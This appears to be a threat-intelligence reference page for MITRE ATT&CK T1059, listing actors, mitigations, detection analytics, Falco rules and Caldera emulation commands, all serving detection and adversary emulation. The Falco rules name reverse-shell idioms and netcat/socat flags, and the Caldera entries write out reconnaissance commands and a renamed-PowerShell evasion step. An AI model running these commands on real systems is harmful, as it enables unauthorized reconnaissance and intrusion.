Home/ATT&CK Technique/Command and Scripting Interpreter
ATT&CK Technique

Command and Scripting Interpreter

T1059 · execution

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic. Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2.

Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.

ContainersESXiIaaSIdentity ProviderLinuxmacOSNetwork DevicesOffice SuiteSaaSWindows

Actors Using This

14
iranAgrius
russia_speaking_cybercrimeAkira
russia_speaking_cybercrimeALPHV / BlackCat
latin_america_brazilian_organized_cybercrimeAmavaldo
north_koreaAndariel
franceAnimal Farm
unknown_likely_russia_alignedAnubis Ransomware
chinaAoqin Dragon
chinaAPT10
chinaAPT17
chinaAPT1
russiaAPT28
russiaAPT29
chinaAPT31

Atomic Tests

1
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
powershellwindowsAutoIt Script Execution
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully. 
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"

Mitigations

9
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1021Restrict Web-Based Content

Restricting web-based content involves enforcing policies and technologies that limit access to potentially malicious websites, unsafe downloads, and unauthorized browser behaviors. This can include URL filtering, download restrictions, script blocking, and extension control to protect against exploitation, phishing, and malware delivery.

Deploy Web Proxy Filtering
  • Use solutions to filter web traffic based on categories, reputation, and content types.
  • Enforce policies that block unsafe websites or file types at the gateway level.
Enable DNS-Based Filtering
  • Implement tools to restrict access to domains associated with malware or phishing campaigns.
  • Use public DNS filtering services to enhance protection.
Enforce Content Security Policies (CSP)
  • Configure CSP headers on internal and external web applications to restrict script execution, iframe embedding, and cross-origin requests.
Control Browser Features
  • Disable unapproved browser features like automatic downloads, developer tools, or unsafe scripting.
  • Enforce policies through tools like Group Policy Management to control browser settings.
Monitor and Alert on Web-Based Threats
  • Use SIEM tools to collect and analyze web proxy logs for signs of anomalous or malicious activity.
  • Configure alerts for access attempts to blocked domains or repeated file download failures.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1033Limit Software Installation

Prevent users or groups from installing unauthorized or unapproved software to reduce the risk of introducing malicious or vulnerable applications. This can be achieved through allowlists, software restriction policies, endpoint management tools, and least privilege access principles.

Application Whitelisting
  • Implement Microsoft AppLocker or Windows Defender Application Control (WDAC) to create and enforce allowlists for approved software.
  • Whitelist applications based on file hash, path, or digital signatures. Restrict User Permissions.
  • Remove local administrator rights for all non-IT users.
  • Use Role-Based Access Control (RBAC) to restrict installation permissions to privileged accounts only. Software Restriction Policies (SRP)
  • Use GPO to configure SRP to deny execution of binaries from directories such as %AppData%, %Temp%, and external drives.
  • Restrict specific file types (.exe, .bat, .msi, .js, .vbs) to trusted directories only. Endpoint Management Solutions.
  • Deploy tools like Microsoft Intune, SCCM, or Jamf for centralized software management.
  • Maintain a list of approved software, versions, and updates across the enterprise. Monitor Software Installation Events.
  • Enable logging of software installation events and monitor Windows Event ID 4688 and Event ID 11707 for software installs.
  • Use SIEM or EDR tools to alert on attempts to install unapproved software. Implement Software Inventory Management.
  • Use tools like OSQuery or Wazuh to scan for unauthorized software on endpoints and servers.
  • Conduct regular audits to detect and remove unapproved software.
Tools for Implementation Application Whitelisting
  • Microsoft AppLocker.
Windows Defender Application Control (WDAC) Endpoint Management
  • Microsoft Intune.
  • SCCM (System Center Configuration Manager)
  • Jamf Pro (macOS)
Puppet or Ansible for automation Software Restriction Policies
  • Group Policy Object (GPO)
Microsoft Software Restriction Policies (SRP) Monitoring and Logging
  • Splunk.
  • OSQuery.
  • Wazuh (open-source SIEM and XDR)
EDRs Inventory Management and Auditing
  • OSQuery.
  • Wazuh.
M1038Execution Prevention

Prevent the execution of unauthorized or malicious code on systems by implementing application control, script blocking, and other execution prevention mechanisms. This ensures that only trusted and authorized code is executed, reducing the risk of malware and unauthorized actions.

Application Control
  • Use Case: Use tools like AppLocker or Windows Defender Application Control (WDAC) to create whitelists of authorized applications and block unauthorized ones. On Linux, use tools like SELinux or AppArmor to define mandatory access control policies for application execution.
  • Implementation: Allow only digitally signed or pre-approved applications to execute on servers and endpoints. (e.g., `New-AppLockerPolicy -PolicyType Enforced -FilePath "C:\Policies\AppLocker.
xml"`) Script Blocking
  • Use Case: Use script control mechanisms to block unauthorized execution of scripts, such as PowerShell or JavaScript. Web Browsers: Use browser extensions or settings to block JavaScript execution from untrusted sources.
  • Implementation: Configure PowerShell to enforce Constrained Language Mode for non-administrator users. (e.g.
, Set-ExecutionPolicy AllSigned) Executable Blocking
  • Use Case: Prevent execution of binaries from suspicious locations, such as %TEMP% or %APPDATA% directories.
  • Implementation: Block execution of .exe, .bat, or .ps1 files from user-writable directories.
Dynamic Analysis Prevention
  • Use Case: Use behavior-based execution prevention tools to identify and block malicious activity in real time.
  • Implemenation: Employ EDR solutions that analyze runtime behavior and block suspicious code execution.
M1040Behavior Prevention on Endpoint

Behavior Prevention on Endpoint refers to the use of technologies and strategies to detect and block potentially malicious activities by analyzing the behavior of processes, files, API calls, and other endpoint events. Rather than relying solely on known signatures, this approach leverages heuristics, machine learning, and real-time monitoring to identify anomalous patterns indicative of an attack.

Suspicious Process Behavior
  • Implementation: Use Endpoint Detection and Response (EDR) tools to monitor and block processes exhibiting unusual behavior, such as privilege escalation attempts.
  • Use Case: An attacker uses a known vulnerability to spawn a privileged process from a user-level application. The endpoint tool detects the abnormal parent-child process relationship and blocks the action.
Unauthorized File Access
  • Implementation: Leverage Data Loss Prevention (DLP) or endpoint tools to block processes attempting to access sensitive files without proper authorization.
  • Use Case: A process tries to read or modify a sensitive file located in a restricted directory, such as /etc/shadow on Linux or the SAM registry hive on Windows. The endpoint tool identifies this anomalous behavior and prevents it.
Abnormal API Calls
  • Implementation: Implement runtime analysis tools to monitor API calls and block those associated with malicious activities.
  • Use Case: A process dynamically injects itself into another process to hijack its execution. The endpoint detects the abnormal use of APIs like OpenProcess and WriteProcessMemory and terminates the offending process.
Exploit Prevention
  • Implementation: Use behavioral exploit prevention tools to detect and block exploits attempting to gain unauthorized access.
  • Use Case: A buffer overflow exploit is launched against a vulnerable application. The endpoint detects the anomalous memory write operation and halts the process.
M1042Disable or Remove Feature or Program

Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled.

Remove Legacy Software
  • Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash).
  • Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date.
Disable Unused Features
  • Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required.
  • Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue.
Control Applications Installed by Users
  • Use Case: Prevent users from installing unauthorized software via group policies or other management tools.
  • Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment.
Remove Unnecessary Services
  • Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices.
  • Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations.
Restrict Add-ons and Plugins
  • Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes.
  • Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks.
M1045Code Signing

Code Signing is a security process that ensures the authenticity and integrity of software by digitally signing executables, scripts, and other code artifacts. It prevents untrusted or malicious code from executing by verifying the digital signatures against trusted sources. Code signing protects against tampering, impersonation, and distribution of unauthorized or malicious software, forming a critical defense against supply chain and software exploitation attacks.

Enforce Signed Code Execution
  • Implementation: Configure operating systems (e.g., Windows with AppLocker or Linux with Secure Boot) to allow only signed code to execute.
  • Use Case: Prevent the execution of malicious PowerShell scripts by requiring all scripts to be signed with a trusted certificate.
Vendor-Signed Driver Enforcement
  • Implementation: Enable kernel-mode code signing to ensure that only drivers signed by trusted vendors can be loaded.
  • Use Case: A malicious driver attempting to modify system memory fails to load because it lacks a valid signature.
Certificate Revocation Management
  • Implementation: Use Online Certificate Status Protocol (OCSP) or Certificate Revocation Lists (CRLs) to block certificates associated with compromised or deprecated code.
  • Use Case: A compromised certificate used to sign a malicious update is revoked, preventing further execution of the software.
Third-Party Software Verification
  • Implementation: Require software from external vendors to be signed with valid certificates before deployment.
  • Use Case: An organization only deploys signed and verified third-party software to prevent supply chain attacks.
Script Integrity in CI/CD Pipelines
  • Implementation: Integrate code signing into CI/CD pipelines to sign and verify code artifacts before production release.
  • Use Case: A software company ensures that all production builds are signed, preventing tampered builds from reaching customers. Key Components of Code Signing.
  • Digital Signature Verification: Verifies the authenticity of code by ensuring it was signed by a trusted entity.
  • Certificate Management: Uses Public Key Infrastructure (PKI) to manage signing certificates and revocation lists.
  • Enforced Policy for Unsigned Code: Prevents the execution of unsigned or untrusted binaries and scripts.
  • Hash Integrity Check: Confirms that code has not been altered since signing by comparing cryptographic hashes.
M1047Audit

Auditing is the process of recording activity and systematically reviewing and analyzing the activity and system configurations. The primary purpose of auditing is to detect anomalies and identify potential threats or weaknesses in the environment. Proper auditing configurations can also help to meet compliance requirements.

The process of auditing encompasses regular analysis of user behaviors and system logs in support of proactive security measures. Auditing is applicable to all systems used within an organization, from the front door of a building to accessing a file on a fileserver. It is considered more critical for regulated industries such as, healthcare, finance and government where compliance requirements demand stringent tracking of user and system activates.

System Audit
  • Use Case: Regularly assess system configurations to ensure compliance with organizational security policies.
  • Implementation: Use tools to scan for deviations from established benchmarks.
Permission Audits
  • Use Case: Review file and folder permissions to minimize the risk of unauthorized access or privilege escalation.
  • Implementation: Run access reviews to identify users or groups with excessive permissions.
Software Audits
  • Use Case: Identify outdated, unsupported, or insecure software that could serve as an attack vector.
  • Implementation: Use inventory and vulnerability scanning tools to detect outdated versions and recommend secure alternatives.
Configuration Audits
  • Use Case: Evaluate system and network configurations to ensure secure settings (e.g., disabled SMBv1, enabled MFA).
  • Implementation: Implement automated configuration scanning tools like SCAP (Security Content Automation Protocol) to identify non-compliant systems.
Network Audits
  • Use Case: Examine network traffic, firewall rules, and endpoint communications to identify unauthorized or insecure connections.
  • Implementation: Utilize tools such as Wireshark, or Zeek to monitor and log suspicious network behavior.
M1049Antivirus/Antimalware

Antivirus/Antimalware solutions utilize signatures, heuristics, and behavioral analysis to detect, block, and remediate malicious software, including viruses, trojans, ransomware, and spyware. These solutions continuously monitor endpoints and systems for known malicious patterns and suspicious behaviors that indicate compromise. Antivirus/Antimalware software should be deployed across all devices, with automated updates to ensure protection against the latest threats.

Signature-Based Detection
  • Implementation: Use predefined signatures to identify known malware based on unique patterns such as file hashes, byte sequences, or command-line arguments. This method is effective against known threats.
  • Use Case: When malware like "Emotet" is detected, its signature (such as a specific file hash) matches a known database of malicious software, triggering an alert and allowing immediate quarantine of the infected file.
Heuristic-Based Detection
  • Implementation: Deploy heuristic algorithms that analyze behavior and characteristics of files and processes to identify potential malware, even if it doesn’t match a known signature.
  • Use Case: If a program attempts to modify multiple critical system files or initiate suspicious network communications, heuristic analysis may flag it as potentially malicious, even if no specific malware signature is available.
Behavioral Detection (Behavior Prevention)
  • Implementation: Use behavioral analysis to detect patterns of abnormal activities, such as unusual system calls, unauthorized file encryption, or attempts to escalate privileges.
  • Use Case: Behavioral analysis can detect ransomware attacks early by identifying behavior like mass file encryption, even before a specific ransomware signature has been identified.
Real-Time Scanning
  • Implementation: Enable real-time scanning to automatically inspect files and network traffic for signs of malware as they are accessed, downloaded, or executed.
  • Use Case: When a user downloads an email attachment, the antivirus solution scans the file in real-time, checking it against both signatures and heuristics to detect any malicious content before it can be opened.
Cloud-Assisted Threat Intelligence
  • Implementation: Use cloud-based threat intelligence to ensure the antivirus solution can access the latest malware definitions and real-time threat feeds from a global database of emerging threats.
  • Use Case: Cloud-assisted antivirus solutions quickly identify newly discovered malware by cross-referencing against global threat databases, providing real-time protection against zero-day attacks.
Tools for Implementation
  • Endpoint Security Platforms: Use solutions such as EDR for comprehensive antivirus/antimalware protection across all systems.
  • Centralized Management: Implement centralized antivirus management consoles that provide visibility into threat activity, enable policy enforcement, and automate updates.
  • Behavioral Analysis Tools: Leverage solutions with advanced behavioral analysis capabilities to detect malicious activity patterns that don’t rely on known signatures.

Detection Coverage

4/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 73
Analytics (MITRE CAR) 6
Runtime / container (Falco) 13
File / malware (YARA) none
Network (Suricata/Snort) 8
Vuln scan (Nuclei) none

CAR Analytics

6
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2013-02-003Moderate coverageProcesses Spawning cmd.exe

The Windows Command Prompt (cmd.exe) is a utility that provides a command line interface to Windows operating systems. It provides the ability to run additional programs and also has several built-in commands such as dir, copy, mkdir, and type, as well as batch scripts (.bat). Typically, when a user runs a command prompt, the parent process is explorer.exe or another instance of the prompt.

There may be automated programs, logon scripts, or administrative tools that launch instances of the command prompt in order to run scripts or other built-in commands. Spawning the process cmd.exe from certain parents may be more indicative of malice. For example, if Adobe Reader or Outlook launches a command shell, this may suggest that a malicious document has been loaded and should be investigated.

Thus, by looking for abnormal parent processes of cmd.exe, it may be possible to detect adversaries.

pseudocode
process = search Process:Create
cmd = filter process where (exe == "cmd.exe")
output cmd
DNIF
_fetch * from event where $LogName=WINDOWS-SYSMON AND $EventID=1 AND $Process=regex(.*cmd\.exe.*)i limit 100
LogPoint
norm_id=WindowsSysmon event_id=1 image="*\cmd.exe"
CAR-2013-04-002Moderate coverageQuick execution of a series of suspicious commands

Certain commands are frequently used by malicious actors and infrequently used by normal users. By looking for execution of these commands in short periods of time, we can not only see when a malicious user was on the system but also get an idea of what they were doing.

Commands of interest
  • arp.exe.
  • at.exe.
  • attrib.exe.
  • cscript.exe.
  • dsquery.exe.
  • hostname.exe.
  • ipconfig.exe.
  • mimikatz.exe.
  • nbstat.exe.
  • net.exe.
  • netsh.exe.
  • nslookup.exe.
  • ping.exe.
  • quser.exe.
  • qwinsta.exe.
  • reg.exe.
  • runas.exe.
  • sc.exe.
  • schtasks.exe.
  • ssh.exe.
  • systeminfo.exe.
  • taskkill.exe.
  • telnet.exe.
  • tracert.exe.
  • wscript.exe.
  • xcopy.exe ### Output Description The host on which the commands were executed, the time of execution, and what commands were executed.
pseudocode
processes = search Process:Create
reg_processes = filter processes where (exe == "arp.exe" or exe == "at.exe" or exe == "attrib.exe"
 or exe == "cscript.exe" or exe == "dsquery.exe" or exe == "hostname.exe"
 or exe == "ipconfig.exe" or exe == "mimikatz.exe" or exe == "nbstat.exe"
 or exe == "net.exe" or exe == "netsh.exe" or exe == "nslookup.exe"
 or exe == "ping.exe" or exe == "quser.exe" or exe == "qwinsta.exe"
 or exe == "reg.exe" or exe == "runas.exe" or exe == "sc.exe"
 or exe == "schtasks.exe" or exe == "ssh.exe" or exe == "systeminfo.exe"
 or exe == "taskkill.exe" or exe == "telnet.exe" or exe == "tracert.exe"
 or exe == "wscript.exe" or exe == "xcopy.exe")
reg_grouped = group reg by hostname, ppid where(max time between two events is 30 minutes)
output reg_grouped
DNIF
_fetch * from event where $LogName=WINDOWS-SYSMON AND $EventID=1 AND $App=regex(arp\.exe|at\.exe|attrib\.exe|cscript\.exe|dsquery\.exe|hostname\.exe|ipconfig\.exe|mimikatz.exe|nbstat\.exe|net\.exe|netsh\.exe|nslookup\.exe|ping\.exe|quser\.exe|qwinsta\.exe|reg\.exe|runas\.exe|sc\.exe|schtasks\.exe|ssh\.exe|systeminfo\.exe|taskkill\.exe|telnet\.exe|tracert\.exe|wscript\.exe|xcopy\.exe)i group count_unique $App limit 100
>>_agg count
>>_checkif int_compare Count > 1 include
LogPoint
norm_id=WindowsSysmon event_id=1 image IN ["*\arp.exe", "*\at.exe", "*\attrib.exe", "*\cscript.exe", "*\dsquery.exe", "*\hostname.exe", "*\ipconfig.exe", "*\mimikatz.exe", "*\nbstat.exe", "*\net.exe", "*\netsh.exe", "*\nslookup.exe", "*\ping.exe", "*\quser.exe", "*\qwinsta.exe", "*\reg.exe", "*\runas.exe", "*\sc.exe", "*\schtasks.exe", "*\ssh.exe", "*\systeminfo.exe", "*\taskkill.exe", "*\telnet.exe", "*\tracert.exe", "*\wscript.exe", "*\xcopy.exe"]
| chart count() as cnt by host
| search cnt > 1
CAR-2014-04-003High coveragePowershell Execution

PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.

Powershell can be used to hide monitored command line execution such as
  • net use.
  • sc start.
pseudocode
process = search Process:Create
powershell = filter process where (exe == "powershell.exe" AND parent_exe != "explorer.exe" )
output powershell
Splunk
index=__your_sysmon_index__ EventCode=1 Image="C:\\Windows\\*\\powershell.exe" ParentImage!="C:\\Windows\\explorer.exe"|stats values(CommandLine) as "Command Lines" values(ParentImage) as "Parent Images" by ComputerName
EQL
process where subtype.create and
  (process_name == "powershell.exe" and parent_process_name != "explorer.exe")
DNIF
_fetch * from event where $LogName=WINDOWS-SYSMON AND $EventID=1 AND $App=powershell.exe NOT $ParentProcess=regex(.*explorer.exe.*)i limit 30
LogPoint
norm_id=WindowsSysmon event_id=1 image="*\powershell.exe" -parent_image="C:\Windows\explorer.exe"
CAR-2014-11-002Moderate coverageOutlier Parents of Cmd

Many programs create command prompts as part of their normal operation including malware used by attackers. This analytic attempts to identify suspicious programs spawning cmd.exe by looking for programs that do not normally create cmd.exe. While this analytic does not take the user into account, doing so could generate further interesting results.

It is very common for some programs to spawn cmd.exe as a subprocess, for example to run batch files or windows commands.

However many process don’t routinely launch a command prompt
  • for example Microsoft Outlook. A command prompt being launched from a process that normally doesn’t launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one. ### Output Description The time and host the new process was started as well as its parent.
pseudocode
processes = search Process:Create
cmd = filter processes where (exe == "cmd.exe")
cmd = from cmd select parent_exe
historic_cmd = filter cmd (where timestamp < now - 1 day AND timestamp > now - 1 day)
current_cmd = filter cmd (where timestamp >= now - 1 day)
new_cmd = historic_cmd - current_cmd
output new_cmd
CAR-2014-11-004Moderate coverageRemote PowerShell Sessions

According to ATT&CK, PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe For this to work, certain registry keys must be set, and the WinRM service must be enabled. The PowerShell command Enter-PSSession -ComputerName \<RemoteHost\> creates a remote PowerShell session.

pseudocode
process = search Process:Create
wsmprovhost = filter process where (exe == "wsmprovhost.exe" and parent_exe == "svchost.exe")
EQL
process where subtype.create and
  (process_name == "wsmprovhost.exe" and parent_process_name == "svchost.exe")
LogPoint
norm_id=WindowsSysmon event_id=1 image="*\wsmprovhost.exe" parent_image="*\svchost.exe"
CAR-2021-01-002Low coverageUnusually Long Command Line Strings

Often, after a threat actor gains access to a system, they will attempt to run some kind of malware to further infect the victim machine. These malware often have long command line strings, which could be a possible indicator of attack. Here, we use sysmon and Splunk to first find the average command string length and search for command strings that stretch over multiple lines, thus identifying anomalies and possibly malicious commands.

Splunk - Splunk search - Identifying possible malware activity via unusually long command line strings
index=* sourcetype="xmlwineventlog" EventCode=4688  |eval cmd_len=len(CommandLine) | eventstats avg(cmd_len) as avg by host| stats max(cmd_len) as maxlen, values(avg) as avgperhost by host, CommandLine | where maxlen > 10*avgperhost

Falco Runtime Rules

13
Container / Linux runtime detections that fire on this technique.
CRITICALReverse Shell from Web Server
Detects common reverse shell patterns spawned from web server processes. Attackers frequently establish reverse shells after exploiting web vulnerabilities to maintain interactive access to the compromised system. This rule looks for specific command patterns known to create reverse shells, including bash /dev/tcp redirects, netcat with -e flag, and common scripting language reverse shell idioms.
view condition
spawned_process and spawned_by_web_server and (proc.cmdline contains "/dev/tcp/" or
     proc.cmdline contains "nc -e" or
     proc.cmdline contains "ncat -e" or
     proc.cmdline contains "bash -i" or
     proc.cmdline contains "python -c 'import socket" or
     proc.cmdline contains "python3 -c 'import socket" or
     proc.cmdline contains "perl -e 'use Socket" or
     proc.cmdline contains "ruby -rsocket" or
     (proc.cmdline contains "mkfifo" and proc.cmdline contains "/tmp"))
ERRORContainer Drift Detected (chmod)
Detect new executables created within a container as a result of chmod. While this detection can generate significant noise, chmod usage is frequently linked to dropping and executing malicious implants. The newer rule "Drop and execute new binary in container" provides more precise detection of this TTP using unambiguous kernel signals. It is recommended to use the new rule. However, this rule might be more relevant for auditing if applicable in your environment, such as when chmod is used on files within the /tmp folder.
view condition
chmod and container and evt.rawres>=0 and ((evt.arg.mode contains "S_IXUSR") or
     (evt.arg.mode contains "S_IXGRP") or
     (evt.arg.mode contains "S_IXOTH"))
and not runc_writing_exec_fifo and not runc_writing_var_lib_docker and not user_known_container_drift_activities
ERRORContainer Drift Detected (open+create)
Detect new executables created within a container as a result of open+create. The newer rule "Drop and execute new binary in container" provides more precise detection of this TTP using unambiguous kernel signals. It is recommended to use the new rule.
view condition
evt.type in (open,openat,openat2,creat) and evt.rawres>=0 and evt.is_open_exec=true and container and not runc_writing_exec_fifo and not runc_writing_var_lib_docker and not user_known_container_drift_activities
INFOSystem user interactive
System (e.g. non-login) users spawning new processes. Can add custom service users (e.g. apache or mysqld). 'Interactive' is defined as new processes as descendants of an ssh session or login process. Consider further tuning by only looking at processes in a terminal / tty (proc.tty != 0). A newer field proc.is_vpgid_leader could be of help to distinguish if the process was "directly" executed, for instance, in a tty, or executed as a descendant process in the same process group, which, for example, is the case when subprocesses are spawned from a script. Consider this rule as a great template rule to monitor interactive accesses to your systems more broadly. However, such a custom rule would be unique to your environment. The rule "Terminal shell in container" that fires when using "kubectl exec" is more Kubernetes relevant, whereas this one could be more interesting for the underlying host.
view condition
spawned_process and system_users and interactive and not user_known_system_user_login
NOTICETerminal shell in container
A shell was used as the entrypoint/exec point into a container with an attached terminal. Parent process may have legitimately already exited and be null (read container_entrypoint macro). Common when using "kubectl exec" in Kubernetes. Correlate with k8saudit exec logs if possible to find user or serviceaccount token used (fuzzy correlation by namespace and pod name). Rather than considering it a standalone rule, it may be best used as generic auditing rule while examining other triggered rules in this container/tty.
view condition
spawned_process and container and shell_procs and proc.tty != 0 and container_entrypoint and not user_expected_terminal_shell_in_container_conditions
NOTICERedirect STDOUT/STDIN to Network Connection in Container
Detect redirection of stdout/stdin to a network connection within a container, achieved by utilizing a variant of the dup syscall (potential reverse shell or remote code execution https://github.com/swisskyrepo/PayloadsAllTheThings/). This detection is behavior-based and may generate noise in the system, and can be adjusted using the user_known_stand_streams_redirect_activities template macro. Tuning can be performed similarly to existing detections based on process lineage or container images, and/or it can be limited to interactive tty (tty != 0).
view condition
dup and container and evt.rawres in (0, 1, 2) and fd.type in ("ipv4", "ipv6") and not user_known_stand_streams_redirect_activities
NOTICEDisallowed SSH Connection Non Standard Port
Detect any new outbound SSH connection from the host or container using a non-standard port. This rule holds the potential to detect a family of reverse shells that cause the victim machine to connect back out over SSH, with STDIN piped from the SSH connection to a shell's STDIN, and STDOUT of the shell piped back over SSH. Such an attack can be launched against any app that is vulnerable to command injection. The upstream rule only covers a limited selection of non-standard ports. We suggest adding more ports, potentially incorporating ranges based on your environment's knowledge and custom SSH port configurations. This rule can complement the "Redirect STDOUT/STDIN to Network Connection in Container" or "Disallowed SSH Connection" rule.
view condition
outbound and proc.exe endswith ssh and fd.l4proto=tcp and ssh_non_standard_ports_network
NOTICESystem procs network activity
Detect any unexpected network activity performed by system binaries that typically shouldn't perform network activity, including coreutils binaries (like sleep, mkdir, who, date, and others) or user management binaries (such as login, systemd, usermod, deluser, adduser, chpasswd, and others). This serves as a valuable baseline detection for network-related activities.
view condition
inbound_outbound and fd.sockfamily = ip and (system_procs or proc.name in (shell_binaries)) and not proc.name in (known_system_procs_network_activity_binaries) and not login_doing_dns_lookup and not user_expected_system_procs_network_activity_conditions
NOTICELaunch Suspicious Network Tool in Container
Detect network tools (like netcat, nmap, tcpdump, socat, and more) launched within containers without any additional filters. This serves as a valuable general detection, but it's recommended to invest engineering effort to fine-tune it and prevent a high volume of legitimate logs. This rule complements the more specific "Netcat Remote Code Execution in Container" rule.
view condition
spawned_process and container and network_tool_procs and not user_known_network_tool_activities
NOTICELaunch Suspicious Network Tool on Host
Detect network tools (like netcat, nmap, tcpdump, socat, and more) launched within containers without any additional filters. This serves as a valuable general detection, but it's recommended to invest engineering effort to fine-tune it and prevent a high volume of legitimate logs. The host equivalent of "Launch Suspicious Network Tool in Container.".
view condition
spawned_process and not container and network_tool_procs and not user_known_network_tool_activities
WARNINGNetcat/Socat Remote Code Execution on Host
Netcat/Socat Program runs on host that allows remote code execution and may be utilized as a part of a variety of reverse shell payload https://github.com/swisskyrepo/PayloadsAllTheThings/. These programs are of higher relevance as they are commonly installed on UNIX-like operating systems.
view condition
spawned_process and not container and ((proc.name = "nc" and (proc.cmdline contains "-e" or
                            proc.cmdline contains "-c")) or
     (proc.name = "ncat" and (proc.args contains "--sh-exec" or
                              proc.args contains "--exec" or proc.args contains "-e " or
                              proc.args contains "-c " or proc.args contains "--lua-exec")) or
     (proc.name = 'socat' and (proc.args contains "EXEC" or
                               proc.args contains "SYSTEM")))
WARNINGWeb Server Spawned Suspicious Child Process
Detects web server processes spawning suspicious child processes like curl, wget, netcat, or scripting interpreters. These often indicate exploitation of web application vulnerabilities, where attackers download additional payloads or establish network connections. This rule is more sensitive than the shell spawning rule and may require tuning in environments where web applications legitimately execute system commands. Override the macro user_known_web_server_child_activities for custom tuning.
view condition
spawned_process and spawned_by_web_server and proc.name in (suspicious_web_children) and not proc.name in (shell_binaries) and not proc.cmdline contains "healthcheck" and not proc.cmdline contains "status" and not user_known_web_server_child_activities
WARNINGNetcat Remote Code Execution in Container
Netcat Program runs inside container that allows remote code execution and may be utilized as a part of a variety of reverse shell payload https://github.com/swisskyrepo/PayloadsAllTheThings/. These programs are of higher relevance as they are commonly installed on UNIX-like operating systems. Can fire in combination with the "Redirect STDOUT/STDIN to Network Connection in Container" rule as it utilizes a different evt.type.
view condition
spawned_process and container and ((proc.name = "nc" and (proc.cmdline contains " -e" or
                            proc.cmdline contains " -c")) or
     (proc.name = "ncat" and (proc.args contains "--sh-exec" or
                              proc.args contains "--exec" or proc.args contains "-e " or
                              proc.args contains "-c " or proc.args contains "--lua-exec"))
     )

Caldera Emulation

10
MITRE Caldera abilities that emulate this technique - each is an executable action for automated adversary emulation.
collectionwindowsPowerShell information gathering
powershell.exe -c "Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log";
collectionwindowscmd.exe information gathering
cmd.exe /c "net user" >> C:\Windows\temp\history.log;
cmd.exe /c "whoami /priv" >> C:\Windows\temp\history.log;
cmd.exe /c "netstat -ano" >> C:\Windows\temp\history.log;
defense-evasionwindowsMove Powershell & triage
Copy-Item C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\debug.exe;
C:\Windows\Temp\debug.exe get-process >> C:\Windows\temp\debug.log;
C:\Windows\Temp\debug.exe get-localgroup >> C:\Windows\temp\debug.log;
C:\Windows\Temp\debug.exe get-localuser >> C:\Windows\temp\debug.log;
C:\Windows\Temp\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion >> C:\Windows\temp\debug.log;
executiondarwinAdd bookmark
osascript bookmark.scpt #{host.chrome.bookmark_title[filters(max=1)]} #{server.malicious.url[filters(max=1)]}
